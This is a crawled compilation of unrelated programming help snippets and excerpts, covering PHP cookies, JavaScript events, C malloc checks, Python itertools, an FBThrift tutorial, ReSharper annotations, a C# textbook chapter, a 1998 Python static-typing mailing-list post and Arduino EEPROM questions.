$_GET. If you initiate the cookie after page load it will be empty. What
you can do is this:
$cookie = functionX('random');

function functionX($key) {
    if (isset($_COOKIE['cookie'][$key])) {
        return $_COOKIE['cookie'][$key];
    } else {
        $randomvar = 'whatever';
        setcookie("cookie[$key]", $randomvar, time()+60*60*24*30, "/", "", 0, true);
        return $randomvar;
    }
}
Skip.addEventListener('click', reloadPage(), true);
// ^^-------------------
Should be:
Skip.addEventListener('click', reloadPage, true);
You want the callback to be reloadPage not what reloadPage returns.
You can use ecmaScript5 bind function, to bind the context and set the
arguments to be passed in.
image[i].onmousedown = whatever.bind(this, name, what, when, where, how );
this here will be the current context where you are binding the event. If
you want to get the context of the element itself then:
image[i].onmousedown = whatever.bind(image[i], name, what, when, where, how
);
As mentioned in MDN you can place this script in your js for older browser
support.
if (!Function.prototype.bind) {
Function.prototype.bind = function (oThis) {
if (typeof this !== "function") {
// closest thing possible to the ECMAScript 5 internal IsCallable
function
throw new TypeError("Function.prototype.bind - what is trying to be
bound is not callable");
}
var aArgs = Arr
I would check the return value of malloc() and use perror() to describe
what error has occured. Also here is the documentation for malloc() and
perror().
if ((product = (MONOM*)malloc(phSize * sizeof(MONOM))) == NULL)
{
    perror("ERROR: Failed to malloc ");
    return 1;
    /* perror() prints a system-specified string describing the error */
}

Also, do you know the size of MONOM? If not, add the following line to your
code:

printf("MONOM SIZE = %zu\n", sizeof(MONOM));  /* %zu is the format for size_t */
The problem is that you aren't specifying POST as the method in your form,
but you are trying to read the form variables from the $_POST variable.
See this thread: What is the default form posting method? for information
about the form defaults. To fix it, you just need to change your form to
this:
<form action='projectadded.php' name="addnewproject"
onsubmit="return(validate());" method="POST">
There are some other things you should change in here, like sanitizing your
inputs before putting them into the database, but those aren't the root of
your problem.
Some errors I see (my apologies if they're already handled in your code):
Your variable target_card only holds the value of the card, not the suit.
You may need to split the full card in two, since cards include both a suit
and a value.
That's not a proper use of the del statement; you don't need to set it equal
to anything or test it for equality.
It would also be helpful to post the errors you got, to help us
troubleshoot.
Also, I don't think this is how Go Fish is played...
Well, the Test Results window was dropped in VS2012.
It sounds like you are using the progress reporter (which rewrites the
terminal output), and the output is getting clobbered with log lines or
something similar. Try using --reporters dots on Travis.
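A minimal sketch of the equivalent setting in karma.conf.js (assuming a standard Karma config file):

// karma.conf.js
module.exports = function (config) {
    config.set({
        // the dots reporter prints one character per test and never rewrites
        // terminal lines, so it is safe for CI logs like Travis
        reporters: ['dots']
    });
};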
This might be done in a lot of ways; here's just my first idea:
Use a mask like this:
Make sure your background image covers the whole button.
Insert two white divs above the background image: left and right of your
button.
Insert a mask like the one above as the button's background.
Due to the transparent area (indicated by the texture), you are able to
display a border-like part of your background image while the rest of it
stays invisible, because it's overlapped.
I illustrated the result of the instructions above.
It's weird behavior; the class files should know where the Javadoc is
after you've added it for the first time.
Are you using a simple Java project? What you could do is make a lib folder
in your project, copy the JARs and sources there, and then add them to the
build path.
As much as possible, try avoiding external dependencies. You never know
when they'll just be gone from where they were.
This was all my fault. App1 does not support iCloud; App2 does. My goof was
the following: I had enabled iCloud on my Mac but not on the VMware virtual
machine. Like any physical machine, I needed to turn iCloud on in the
Settings of the OS X virtual machine.
Mark
Try this, it will solve your problem:

$(function() {
    $("#mission").hover(function () {
        $(".to-be-hidden").each(function (index) {
            $(this).stop().animate({opacity: 0.5}, "slow");
            $('#feat-hover').stop().animate({'opacity': '1.0'}, "slow");
        });
    },
    function () {
        $(".to-be-hidden").each(function (index) {
            $(this).stop().animate({opacity: 1.0}, "slow");
            $('#feat-hover').stop().animate({'opacity': '0'}, "slow");
        });
    });
});
Per the jQuery documentation for the dblclick event, it is inadvisable to
bind handlers to both the click and dblclick events for the same element.
You want to change your events so that you don't have a .click and a
.dblclick on the same element.
You have code like this:
if A
if B
else C
That else applies to the if B, NOT the if A.
I think you meant this:
if A
elseif B
else C
Conditional Comments. There are some other alternatives, but conditional comments are the most reliable way to target old versions of Internet Explorer.
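A minimal sketch of an Internet Explorer conditional comment (the script file name is illustrative). Only IE versions below 9 execute the block; every other browser treats it as a plain HTML comment:

<!--[if lt IE 9]>
    <script src="ie-fallback.js"></script>
<![endif]-->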
This is due to the behaviour of floating point arithmetic, which is
explained in this question. The opacity never actually reaches 0, so
the timer is never cleared.
The solution is to use toFixed(1) when you are performing your subtraction
and addition:
var timer = setInterval(function (){
el.style.opacity = (el.style.opacity - 0.1).toFixed(1);
if (el.style.opacity == 0) {
clearInterval(timer);
}
}, 40);
JSfiddle example is here:
Don't try to rewrite the whole multiprocessing library. I think you
can use any of the multiprocessing.Pool methods, depending on your needs;
if this is a batch job you can even use the synchronous
multiprocessing.Pool.map(). Instead of pushing to an input queue, you
write a generator that yields input to the workers.
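A minimal sketch of that idea (the worker function and input generator are illustrative stand-ins):

from multiprocessing import Pool

def process(item):
    # stand-in for the real per-item work
    return item * item

def generate_inputs():
    # yields work items instead of pushing them onto an input queue
    for i in range(100):
        yield i

if __name__ == '__main__':
    with Pool(4) as pool:
        # map() consumes the generator and distributes items across the pool
        results = pool.map(process, generate_inputs())
    print(results[:5])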
When the map function generates intermediate results and first sends them
to the buffer, partitioning and sorting will start and, if a combiner is
specified, it will be invoked at this time. This process runs in parallel
with the map function. When the map function finishes, all the spills on disk
are merged, and combiners are invoked at this time too.
The buffer threshold is controlled by io.sort.spill.percent; when it is
reached, spills are created. If the number of spills is more than
min.num.spills.for.combine, the combiner is invoked on the spills created
before writing to disk.
So to answer your question: you are right, it is choice a).
Ref : This mail thread.
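For reference, a minimal sketch of the two knobs mentioned above, as they would appear in an old-style mapred-site.xml (the values here are illustrative, not recommendations):

<property>
    <name>io.sort.spill.percent</name>
    <!-- fraction of the sort buffer that triggers a spill to disk -->
    <value>0.80</value>
</property>
<property>
    <name>min.num.spills.for.combine</name>
    <!-- run the combiner during the merge only if at least this many spills exist -->
    <value>3</value>
</property>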
Assuming that you mean the title element within head, one option, if you
can, would be to use JavaScript.
// set current title to foo
document.title = 'foo';
Try this; it works perfectly.
/*
* To change this template, choose Tools | Templates
* and open the template in the editor.
*/
package com.java.util.test;
import java.text.DateFormat;
import java.text.SimpleDateFormat;
import java.util.HashMap;
import javax.swing.JFrame;
/**
*
* @author shreyansh.jogi
*/
import java.awt.*;
import java.awt.event.ActionEvent;
import java.awt.event.ActionListener;
import javax.swing.*;
public class JavaApplication2 extends JFrame implements ActionListener {
/**
*
*/
private static final long serialVersionUID = 1L;
JButton num1, num2, num3, num4, num5, num6, num7, num8, num9, num0,
add, sub, div, mult, equalto, exit, point, reset;
JTextField txtfld;
String s = "", ope = "";
int flag = 0;
double total1;
double
You can use a combination of itertools.groupby and collections.Counter:
>>> from itertools import groupby
>>> from collections import Counter
>>> Counter(k for k, g in groupby(strs))
Counter({'T': 5, 'H': 4})
itertools.groupby groups the items based on a key. (By default the key is
the item in the iterable itself.)
>>> from pprint import pprint
>>> pprint([(k, list(g)) for k, g in groupby(strs)])
[('T', ['T', 'T']),
('H', ['H', 'H']),
('T', ['T']),
('H', ['H', 'H']),
('T', ['T']),
('H', ['H', 'H', 'H', 'H']),
('T', ['T', 'T']),
('H', ['H', 'H', 'H']),
('T', ['T', 'T', 'T'])]
Here the first item is the key (k) on which the items were grouped, and
list(g) is the group related to that key. As we're only interested in
counting the runs, we pass just the keys to Counter.
A cleaner solution (if I understood the problem correctly) would be to
simply ignore lines that contain the same text as the previous one after
"You're currently in: ". You are interested in the timestamp of the last
line that wasn't ignored under this condition.
ignore_if_equal_to = None
with open(file_location) as file_object:
    for each_line in file_object:
        if "You're currently in: " in each_line:
            trail = each_line.split("You're currently in: ")[1:]
            if trail == ignore_if_equal_to:
                continue
            recent_statement = each_line  # was eachLine, which is undefined
            ignore_if_equal_to = trail
print recent_statement
Assuming you refer to a BroadcastReceiver: you can use the same intent
filters to launch an activity, a service, or even a single BroadcastReceiver
in the manifest, like this (the receiver and action names below are
placeholders, since they were lost from the original post):

<receiver android:name=".MyReceiver">
    <intent-filter>
        <action android:name="com.example.MY_ACTION" />
    </intent-filter>
</receiver>

This example is for a BroadcastReceiver. Also, can you post your code?
Here is a nice tutorial about BroadcastReceivers: vogella's Android
BroadcastReceiver article.
You make two requests: one by calling builder.sendRequest(null, new
RequestCallback()), and the other in the callback, with status 200, via
Window.Location.replace(link).
By the way, I hope this isn't code that will be deployed:
Exceptions are not handled.
Database operations should be done in their own layer.
I can't see any consistent code conventions.
You should only select the columns you really need.
There are unnecessary declarations.
There are many other points, but you should fix these first, and then you
will be able to find errors and maintain the code yourself.
Language management
Asked by ntrubert-cobweb on 2010-08-24
As Magento meta information and translations are available per product, is there a possibility to synchronize translations between OpenERP and Magento?
If yes, is it by shop relation?
One language per shop?
Blueprints for this already exist; sorry for that.
We can totally manage the language when we export products from OpenERP to Magento.
You just have to select the correct language in OpenERP for each storeview. (You can do it from the shop view.)
Also, you have to select the default language of your Magento instance from the Magento instance menu.
Importing products from Magento to OpenERP in multiple languages is not possible right now. If you are interested in this functionality, you can contact us.
Regards
The answer is no: the "Magento OpenERP Connector" is not ready yet to manage language import/export.
base_external_referentials calls the Magento API without the store_view parameter:

def ext_create(self, cr, uid, data, conn, method, oe_id, context):
    return conn.call(method, data, <we have to add store_view code here according to the language context>)

def try_ext_update(self, cr, uid, data, conn, method, oe_id, external_id, ir_model_data_id, create_method, context):
    return conn.call(method, [external_id, data], <we have to add store_view code here according to the language context>)

I am going to add blueprints.
Build FBThrift
FBThrift source can be obtained from their GitHub page. The installation procedure is typical and relatively straightforward. One catch is that the README does not mention rsocket-cpp in the dependencies, but it is needed as well. (If you encounter 'internal compiler error: cpp1ypl' when building rsocket-cpp, try running make without
-j.)
After successfully building FBThrift, the thrift compiler is available at
/path/to/fbthrift/build/bin/thrift1, which can be used to generate the C++ service source. It seems that most online guides on using the FBThrift compiler are outdated and refer to the Python module
thrift_compiler. Instead, this GitHub issue is helpful in making it work. To generate C++ source files from the IDL file
example.thrift, run:

/path/to/fbthrift/build/bin/thrift1 --gen mstch_cpp2 --templates /path/to/fbthrift/thrift/compiler/generate/templates example.thrift
Content of example.thrift:
# example.thrift
namespace cpp tamvm

service ExampleService {
    i32 get_number(1:i32 number);
}
Implement ExampleService
Implementing the service code is not much different from Apache Thrift. Output C++ files are generated in
./gen-cpp2 by default. Pay attention to the generated file
ExampleService.h, which contains the interface
ExampleServiceSvIf which we need to override with actual service logic.
class ExampleHandler : public ExampleServiceSvIf {
public:
    int32_t get_number(int32_t n) override {
        printf("server: receive %d", n);
        return n;
    }
};
Create client and server instances
For the purpose of this demo, we are going to have a FBThrift client and a server running in one process.
int main(int argc, char *argv[]) {
    LOG(INFO) << "Starting test ...";
    FLAGS_logtostderr = 1;
    folly::init(&argc, &argv);

    // starting server on a separate thread
    std::thread server_thread([] {
        auto server = newServer(thrift_port);
        LOG(INFO) << "server: starts";
        server->serve();
    });
    server_thread.detach();

    // wait for a short while - enough for socket opening
    std::this_thread::sleep_for(std::chrono::milliseconds(50));

    // create event runloop, to run on this thread
    folly::EventBase eb;
    folly::SocketAddress addr("127.0.0.1", thrift_port);

    // creating client
    auto client = newHeaderClient(&eb, addr);

    std::vector<folly::Future<folly::Unit>> futs;
    for (int32_t i = 10; i < 14; i++) {
        LOG(INFO) << "client: send number " << i;
        auto f = client->future_get_number(i);
        futs.push_back(std::move(f).thenValue(onReply).thenError<std::exception>(onError));
    }

    collectAll(futs.begin(), futs.end()).thenValue([&eb](std::vector<folly::Try<folly::Unit>>&& v) {
        LOG(INFO) << "client: received all responses";
        eb.terminateLoopSoon();
    });

    // libevent/epoll loop which keeps the main thread from exiting.
    eb.loopForever();
    return 0;
}
The above code uses the
folly::Future based API for clarity. The
RequestCallback API will do just as well.
folly::EventBase is the main run loop on which async callbacks are scheduled. The call to
client->future_get_number does not actually send the outbound request right away. Rather, it schedules the task on the EventBase run loop to be executed in batch 1. As a result, the request is only actually sent when the caller method gives up program control (whether it returns or waits as a coroutine) 2. If the actual time when the request is sent matters, the
RequestCallback API is useful.
Notice the last line,
eb.loopForever, is there to keep the program from quitting before collecting all responses. You can replace it with another non-blocking wait call. (
std::this_thread::sleep is not one of them:
sleep blocks the main thread and the EventBase run loop can't proceed.)
Build and Run
Build and run is basic:
mkdir build && cd build
cmake ..
make
./fbthrift_ex
If you encounter this error
exception specification in declaration does not match previous declaration, change the compiler to g++ instead of clang++.
Final output:
WARNING: Logging before InitGoogleLogging() is written to STDERR
I0123 17:05:29.276188 26497 main.cc:103] Starting test ...
I0123 17:05:29.276881 26498 main.cc:110] server: starts
I0123 17:05:29.327250 26497 main.cc:121] client: send number 10
I0123 17:05:29.327659 26497 main.cc:121] client: send number 11
I0123 17:05:29.327802 26497 main.cc:121] client: send number 12
I0123 17:05:29.327927 26497 main.cc:121] client: send number 13
I0123 17:05:29.328977 26512 ExampleHandler.h:11] server: receive 11
I0123 17:05:29.328977 26511 ExampleHandler.h:11] server: receive 10
I0123 17:05:29.329150 26510 ExampleHandler.h:11] server: receive 12
I0123 17:05:29.329188 26509 ExampleHandler.h:11] server: receive 13
I0123 17:05:29.329497 26497 main.cc:95] client: get response 10
I0123 17:05:29.329609 26497 main.cc:95] client: get response 11
I0123 17:05:29.329762 26497 main.cc:95] client: get response 12
I0123 17:05:29.329864 26497 main.cc:95] client: get response 13
I0123 17:05:29.329892 26497 main.cc:126] client: received all responses
Again, the complete source code of the example is here:
Hello
I have some code that I have decorated with a MessageSink attribute to perform mediator-pattern communication between ViewModels.
The problem I get is that this method then gets marked as an unused method by ReSharper.
So I got the hint that I should use MeansImplicitUse to avoid this.
However, when I tried to annotate the methods with MeansImplicitUse, I got an error message saying that it can only be used on classes. So I can't put it on my decorated method, and putting it on my MessageSinkAttribute class doesn't actually imply the use in the class where the decorated method is.
I would like to avoid putting it on the whole ViewModel if possible, but I am not quite sure how this is supposed to work. Is there something I have overlooked? Any hints in the right direction would be appreciated.
Hello Jon
The MeansImplicitUse attribute can be applied to some custom attribute class A that you have in order to tell ReSharper that everything that has attribute A is used implicitly. There's also the UsedImplicitly attribute, that can tell ReSharper that the symbol with that attribute is used implicitly and it shouldn't be counted as unused. So in order to achieve your goal you can either put MeansImplicitUse attribute on your MessageSinkAttribute class or put UsedImplicitly attribute on all methods that you don't want ReSharper to count as unused. Let me know if this helps. Thank you!
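For illustration, a minimal sketch of both options (this assumes the JetBrains.Annotations namespace is referenced; the ViewModel class and method names are hypothetical, only MessageSinkAttribute comes from the question):

using System;
using JetBrains.Annotations;

// Option 1: annotate the custom attribute itself, so every member
// decorated with [MessageSink] counts as implicitly used.
[MeansImplicitUse]
public class MessageSinkAttribute : Attribute { }

public class SomeViewModel
{
    // Option 2: annotate an individual method directly.
    [UsedImplicitly]
    [MessageSink]
    public void HandleMessage(object message) { }
}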
Andrey Serebryansky
Senior Support Engineer
JetBrains, Inc
"Develop with pleasure!"
Ah, thank you Andrey Serebryansky.
The UsedImplicitly attribute was what I was looking for. I had some problems when I tried to use the code that you get from the options menu instead of the DLL directly, but I guess it was a namespace issue.
It works if I reference the DLL directly and use that attribute.
Thank you so much for your patience with me.
On a related note: this guide mentions ReSharper 4.0. Is this still the most up-to-date documentation for all available annotations?
Jon Warghed
Software Developer
Atea Services and Software
The essence of object-oriented programming is the creation of new types. A type represents a thing. Sometimes the thing is abstract, such as a data table or a thread; sometimes it is more tangible, such as a button in a window. A type defines the thing's general properties and behaviors.
If your program uses three instances of a button type in a window (say, an OK, a Cancel, and a Help button), each instance will share certain properties and behaviors. Each, for example, will have a size (though it might differ from that of its companions), a position (though again, it will almost certainly differ in its position from the others), and a text label (e.g., "OK," "Cancel," and "Help"). Likewise, all three buttons will have common behaviors, such as the ability to be drawn, activated, pressed, and so forth. Thus, the details might differ among the individual buttons, but they are all of the same type.
As in many object-oriented programming languages, in C# a type is defined by a class, while the individual instances of that class are known as objects. Later chapters explain that there are other types in C# besides classes, including enums, structs, and delegates, but for now the focus is on classes.
The "Hello World" program declares a single type: the Hello class. To define a C# type, you declare it as a class using the class keyword, give it a name (in this case, Hello), and then define its properties and behaviors. The property and behavior definitions of a C# class must be enclosed by open and closed braces ({}).
A class has both properties and behaviors. Behaviors are defined with member methods; properties are discussed in Chapter 3.
A method is a function owned by your class. In fact, member methods are sometimes called member functions. The member methods define what your class can do or how it behaves. Typically, methods are given action names, such as WriteLine( ) or AddNumbers( ). In the case shown here, however, the class method has a special name, Main( ), which doesn't describe an action but does designate to the Common Language Runtime (CLR) that this is the main, or first method, for your class.
The CLR calls Main( ) when your program starts. Main( ) is the entry point for your program, and every C# program must have a Main( ) method.[1]
[1] It is technically possible to have multiple Main( ) methods in C#; in that case you use the /main command-line switch to tell C# which class contains the Main( ) method that should serve as the entry point to the program.
Method declarations are a contract between the creator of the method and the consumer (user) of the method. It is likely that the creator and consumer of the method will be the same programmer, but this does not have to be so: it is possible that one member of a development team will create the method and another programmer will use it.
To declare a method, you specify a return value type followed by a name. Method declarations also require parentheses, whether the method accepts parameters or not. For example:
int myMethod(int size);
declares a method named myMethod( ) that takes one parameter: an integer that will be referred to within the method as size. This method returns an integer value. The return value type tells the consumer of the method what kind of data the method will return when it finishes running.
Some methods do not return a value at all; these are said to return void, which is specified by the void keyword. For example:
void myVoidMethod( );
declares a method that returns void and takes no parameters. In C# you must always declare a return type or void.
A C# program can also contain comments. Take a look at the first line after the opening brace:
// Use the system console object
The text begins with two forward slash marks (//). These designate a comment. A comment is a note to the programmer and does not affect how the program runs. C# supports three types of comments.
The first type, just shown, indicates that all text to the right of the comment mark is to be considered a comment, until the end of that line. This is known as a C++ style comment.
The second type of comment, known as a C-style comment, begins with an open comment mark (/*) and ends with a closed comment mark (*/). This allows comments to span more than one line without having to have // characters at the beginning of each comment line, as shown in Example 2-2.

class HelloWorld
{
    static void Main( )
    {
        /* Use the system console object
           as explained in the text
           in chapter 2 */
        System.Console.WriteLine("Hello World");
    }
}

It is possible to nest C++-style comments within C-style comments. For this reason, it is common to use C++-style comments whenever possible, and to reserve the C-style comments for "commenting-out" blocks of code.
The third and final type of comment that C# supports is used to associate external XML-based documentation with your code, and is illustrated in Chapter 13.
"Hello World" is аn exаmple of а console progrаm. A console аpplicаtion hаs no grаphicаl user interfаce (GUI); there аre no list boxes, buttons, windows, аnd so forth. Text input аnd output is hаndled through the stаndаrd console (typicаlly а commаnd or DOS window on your PC). Sticking to console аpplicаtions for now helps simplify the eаrly exаmples in this book, аnd keeps the focus on the lаnguаge itself. In lаter chаpters, we'll turn our аttention to Windows аnd web аpplicаtions, аnd аt thаt time we'll focus on the Visuаl Studio .NET GUI design tools.
All thаt the Mаin( ) method does in this simple exаmple is write the text "Hello World" to the monitor. The monitor is mаnаged by аn object nаmed Console. This Console object hаs а method cаlled WriteLine( ) thаt tаkes а string (а set of chаrаcters) аnd writes it to the stаndаrd output. When you run this progrаm, а commаnd or DOS screen will pop up on your computer monitor аnd displаy the words "Hello World."
You invoke а method with the dot operаtor (.). Thus, to cаll the Console object's WriteLine( ) method, you write Console.WriteLine(...), filling in the string to be printed.
Console is only one of а tremendous number of useful types thаt аre pаrt of the .NET Frаmework Clаss Librаry (FCL). Eаch class hаs а nаme, аnd thus the FCL contаins thousаnds of nаmes, such аs ArrаyList, Hаshtable, FileDiаlog, DаtаException, EventArgs, аnd so on. There аre hundreds, thousаnds, even tens of thousаnds of nаmes.
This presents а problem. No developer cаn possibly memorize аll the nаmes thаt the .NET Frаmework uses, аnd sooner or lаter you аre likely to creаte аn object аnd give it а nаme thаt hаs аlreаdy been used. Whаt will hаppen if you develop your own Hаshtable class, only to discover thаt it conflicts with the Hаshtable class thаt .NET provides? Remember, eаch class in C# must hаve а unique nаme.
You certаinly could renаme your Hаshtable class mySpeciаlHаshtable, for exаmple, but thаt is а losing bаttle. New Hаshtable types аre likely to be developed, аnd distinguishing between their type nаmes аnd yours would be а nightmаre.
The solution to this problem is to creаte а nаmespаce. A nаmespаce restricts а nаme's scope, mаking it meаningful only within the defined nаmespаce.
Assume thаt I tell you thаt Jim is аn engineer. The word "engineer" is used for mаny things in English, аnd cаn cаuse confusion. Does he design buildings? Write softwаre? Run а trаin?
In English I might clаrify by sаying "he's а scientist," or "he's а trаin engineer." A C# progrаmmer could tell you thаt Jim is а science.engineer rаther thаn а trаin.engineer. The nаmespаce (in this cаse, science or trаin) restricts the scope of the word thаt follows. It creаtes а "spаce" in which thаt nаme is meаningful.
Further, it might hаppen thаt Jim is not just аny kind of science.engineer. Perhаps Jim grаduаted from MIT with а degree in softwаre engineering, not civil engineering (аre civil engineers especiаlly polite?). Thus, the object thаt is Jim might be defined more specificаlly аs а science.softwаre.engineer. This classificаtion implies thаt the nаmespаce softwаre is meаningful within the nаmespаce science, аnd thаt engineer in this context is meаningful within the nаmespаce softwаre. If lаter you leаrn thаt Chаrlotte is а trаnsportаtion.trаin.engineer, you will not be confused аs to whаt kind of engineer she is. The two uses of engineer cаn coexist, eаch within its own nаmespаce.
Similаrly, if it turns out thаt .NET hаs а Hаshtable class within its System.Collections nаmespаce, аnd thаt I hаve аlso creаted а Hаshtable class within а ProgCShаrp.DаtаStructures nаmespаce, there is no conflict, becаuse eаch exists in its own nаmespаce.
In Example 2-1, the Console object's name is restricted to the System namespace by using the code:
System.Console.WriteLine( );
In Example 2-1, the dot operator (.) is used both to access a method (and data) in a class (in this case, the method WriteLine( )), and to restrict the class name to a specific namespace (in this case, to locate Console within the System namespace). This works well because in both cases we are "drilling down" to find the exact thing we want. The top level is the System namespace (which contains all the System objects that the Framework provides); the Console type exists within that namespace, and the WriteLine( ) method is a member function of the Console type.
In many cases, namespaces are divided into subspaces. For example, the System namespace contains a number of subnamespaces such as Configuration, Collections, Data, and so forth, while the Collections namespace itself is divided into multiple subnamespaces.
Namespaces can help you organize and compartmentalize your types. When you write a complex C# program, you might want to create your own namespace hierarchy, and there is no limit to how deep this hierarchy can be. The goal of namespaces is to help you divide and conquer the complexity of your object hierarchy.
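For instance, a minimal sketch of declaring your own namespace hierarchy, using the ProgCSharp.DataStructures name mentioned earlier (the class body is illustrative):

namespace ProgCSharp.DataStructures
{
    // This Hashtable does not conflict with System.Collections.Hashtable,
    // because each lives in its own namespace.
    public class Hashtable
    {
    }
}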
Rather than writing the word System before Console, you could specify that you will be using types from the System namespace by writing the statement:
using System;
at the top of the listing, as shown in Example 2-3.

using System;

class Hello
{
    static void Main( )
    {
        // Console from the System namespace
        Console.WriteLine("Hello World");
    }
}

Notice the using System statement is placed before the Hello class definition.
Although you can designate that you are using the System namespace, you cannot designate that you are using the System.Console object, as you can with some languages. Example 2-4 will not compile.

using System.Console;

class Hello
{
    static void Main( )
    {
        // Console from the System namespace
        WriteLine("Hello World");
    }
}
This generates the compile error:
error CS0138: A using namespace directive can only be applied to namespaces; 'System.Console' is a class not a namespace
The using keyword can save a great deal of typing, but it can undermine the advantages of namespaces by polluting the namespace with many undifferentiated names. A common solution is to use the using keyword with the built-in namespaces and with your own corporate namespaces, but perhaps not with third-party components.
C# is case-sensitive, which means that writeLine is not the same as WriteLine, which in turn is not the same as WRITELINE. Unfortunately, unlike in Visual Basic (VB), the C# development environment will not fix your case mistakes; if you write the same word twice with different cases, you might introduce a tricky-to-find bug into your program.
To prevent such a time-wasting and energy-depleting mistake, you should develop conventions for naming your variables, functions, constants, and so forth. The convention in this book is to name variables with camel notation (e.g., someVariableName), and to name functions, constants, and properties with Pascal notation (e.g., SomeFunction).
The Main( ) method shown in Example 2-1 has one more designation. Just before the return type declaration void (which, you will remember, indicates that the method does not return a value) you'll find the keyword static:
static void Main( )
The static keyword indicates that you can invoke Main( ) without first creating an object of type Hello. This somewhat complex issue will be considered in much greater detail in subsequent chapters. One of the problems with learning a new computer language is you must use some of the advanced features before you fully understand them. For now, you can treat the declaration of the Main( ) method as tantamount to magic.
On Thu, Nov 26, 1998 at 07:07:20PM +0100, Vladimir Marangozov wrote:
> It's quite unclear to me, even after the 50 types-sig messages that landed
> in my inbox, what an (optional) Python interface is, and why should I feel
> happier if the Scarecrow (or another) formula is implemented in some way
I must say that I am in much the same state. I haven't really seen anyone
try to explain why I should feel happier if static types and interfaces are
implemented in Python. Maybe if someone could give me an example of a real
world problem they couldn't solve in Python because it lacked these features
it would be easier for me to understand the need we are trying to address
here.
Having read through Roger Masse's original paper on "Add Later" types as well
as the various follow ups it seems that the reasons to use static types are:
1. Static types can improve readability by making the programmer's
intentions more explicit,
2. Optimize for increased performance,
3. For detecting type errors,
4. The existing type system in Python is nice for development within small
groups but is not well suited for large-scale development because of the
difficulty in specifying a common interface without implementation to
convey behavior.
All in all, those are, in my opinion, thoroughly unconvincing arguments.
[Caveat: I am neither a language nor a compiler designer and don't know a
whole lot about either so I may be talking out of my ass on all of this. If
I am, I'm sure someone will let me know :-) ]
-------------------------------------------------------------------------
1. I don't think that static types really improve readability in any way
whatsoever. The problem? The type is only shown when the variable is
declared, not every time it is used. Even though C is statically typed lots
of people use Hungarian notation to get around this very problem. If we are
really interested in increasing the readability of programs by making the
programmer's intentions more explicit then why don't we develop a Dutch
naming scheme and use that (i.e. port_h [h => heel]) instead?
-------------------------------------------------------------------------
2. I agree with Skip Montanaro's comments that it's not clear we've come
close to exhausting the performance possibilities of Python as it currently
exists. He and others have pointed out other interesting avenues to explore.
If performance is the concern then I think rather than changing the syntax in
any way we should first try to make nonvisible changes. Maybe there could be
some kind of JIT compiler for Python, I dunno. Would it be possible for
there to be a Python compiler that does global analysis of the entire program
and then does some magic type inferencing and dynamic code recompilation to
notice that var is only ever assigned integers and then generate appropriate
byte code for that situation?
What's more, I'm not convinced that performance is such an issue. I'm
sure that other people have had other experiences, but at my work the only
times that speed has ever mattered it has mattered so much that Python could
never possibly be a contender no matter how fast it is. When Python is
playing the role of a glue or an extension language, it's already fast enough
for every use I've ever seen. On the other hand, even if we do nothing
Python will be twice as fast next year as it is this year. How fast is fast
enough? How slow is too slow?
More to the point, how much will static typing in Python actually affect
these things? Would we be willing to add a change as major as static typing
for a 10% speed increase?
-------------------------------------------------------------------------
3. Roger Masse writes that static typing provides an 'improved level of type
safety and program correctness' but I'm not aware of any empirical evidence
of this. Is this just simply "common sense"? I am wary of "common sense"
that is lacking an empirical foundation. Don't forget that for many people
it was "common sense" that the earth was flat, that the earth was the center
of the universe, and that maggots spontaneously generated from rotten meat.
Why should we rush to change our favorite language when there is no proof
that doing so will provide the benefits we claim we want?
Is a strongly typed system actually safer in any way whatsoever? As Dave
Beazley asks, "are there really huge numbers of people out there writing
unreliable Python programs? Is type-safety going to solve their problem even
if it were available?" Why add a language feature that doesn't solve a
problem? C is a weakly typed language but people still seem to be able to
create "safe" systems in it....
IMHO there would be some problems with static typing in Python anyway. Would
the static type system catch something like the following:
====================================
def myCallable( d : MyClass):
return d.my_method()
val : MyClass
val = MyClass()
del val.my_method
myCallable(val)
====================================
Would the type system notice that I am turning val into something that no
longer conforms to the MyClass interface?
In any case, the static typing unnecessarily restricts me in this example.
The function 'myCallable' doesn't really need to have an object of MyClass
passed in. It only needs something that has the 'my_method'. The proposal
mentions COMPARABLE as one possible 'protocol' used in static typing. But
what if I only implement < and > ? I would still be able to use a lot of
methods that claim to only take COMPARABLE...but the typing system would
prevent me from doing so.
Say some library designer decides that his function will only take numbers.
Now, he _thinks_ that his function only works on integers. Actually, he's
wrong. Because I have this nifty class that I designed that mostly works
like numbers and his function would product the right result if it were
called on my class. But my class aren't numbers. Maybe my class doesn't
form an abelian group under addition for whatever reason. But that has no
effect whatsoever on the ability of this one function to Do The Right Thing
to my class. But I can't use it because the library writer _thought_ he knew
everything about every future user of his functions.
Roger Masse asks of dynamic typing, "More importantly, how do you gain
confidence that an implementation of a file-like object has implemented seek
fully without running it?" Just because I am using a statically typed
language I am not saved. Sure I may have a file-like object that has a
method named seek that takes the parameters I think it's supposed to. But
how do I know it doesn't just delete the file handle instead of actually
doing a seek? With a statically typed language Masse's question simply
becomes,
"More importantly, how do you gain confidence that an implementation of a
file-like object has implemented seek in the way you think it ought to
implement seek without running it?"
In short, I don't think that static typing gives you a whole lot in terms of
safety...certainly not enough to warrant adding the feature to the core
language, even as an optional one. If we had Design By Contract in Python
(with inherited assertions and so forth) would that be sufficient to satisfy
our needs for safety? [BTW, Roger Masse writes that "static typing is a
prerequisite for design by contract" but I don't understand why.]
-------------------------------------------------------------------------
4. I agree that specifying an interface without the implementation would be
nice for larger projects. But couldn't that same kind of information be
generated by some documentation tool like interdoc or whatever the docutils
people have cooked up? Shouldn't people be reading the documentation for the
code rather than the code anyway? Why would we want to encourage people to
bypass the documentation and read the code directly? Why would we want to
encourage skimping on documentation? It seems that adding static typing to
Python as a way of providing documentation to Python code is somewhat
misguided. Instead shouldn't we use __doc__ strings with structured
formatting?
-------------------------------------------------------------------------
In short my complaints about static typing (and protocols/interfaces, I
suppose) are that I don't see what problems these new features would solve
that currently available features can't. I think there are definitely ways
that Python can improve and grow, I just don't think that static types are
one of those ways. I look forward to hearing what proponents of static
typing and protocols think about this.
--
Justus Pendleton <justus@[...].org>
|
http://aspn.activestate.com/ASPN/Mail/Message/types-sig/584351
|
crawl-002
|
refinedweb
| 1,449
| 61.77
|
char num_rcv[20];
char num_save[20];
gsm.readSMS(smsdata, 160, num_rcv, 20); // receiving the number
strcpy(num_save, num_rcv); // after receiving, copy num_rcv into num_save
how many numbers I can store in each address?
Quote from: jepoy12 on Mar 10, 2013, 05:50 am: "how many numbers I can store in each address?"
One.
Quote from: Nick Gammon on Mar 10, 2013, 06:17 am (answering "how many numbers I can store in each address?"): "One."
So saying one is absolutely correct, but might be slightly misleading to the quick reader. It's one per address, and there are 1k addresses.
#include <avr/eeprom.h>

#define NUM_MAX 20
char num_rcv[NUM_MAX];
char num_save[NUM_MAX] EEMEM; // You could have an initial value here

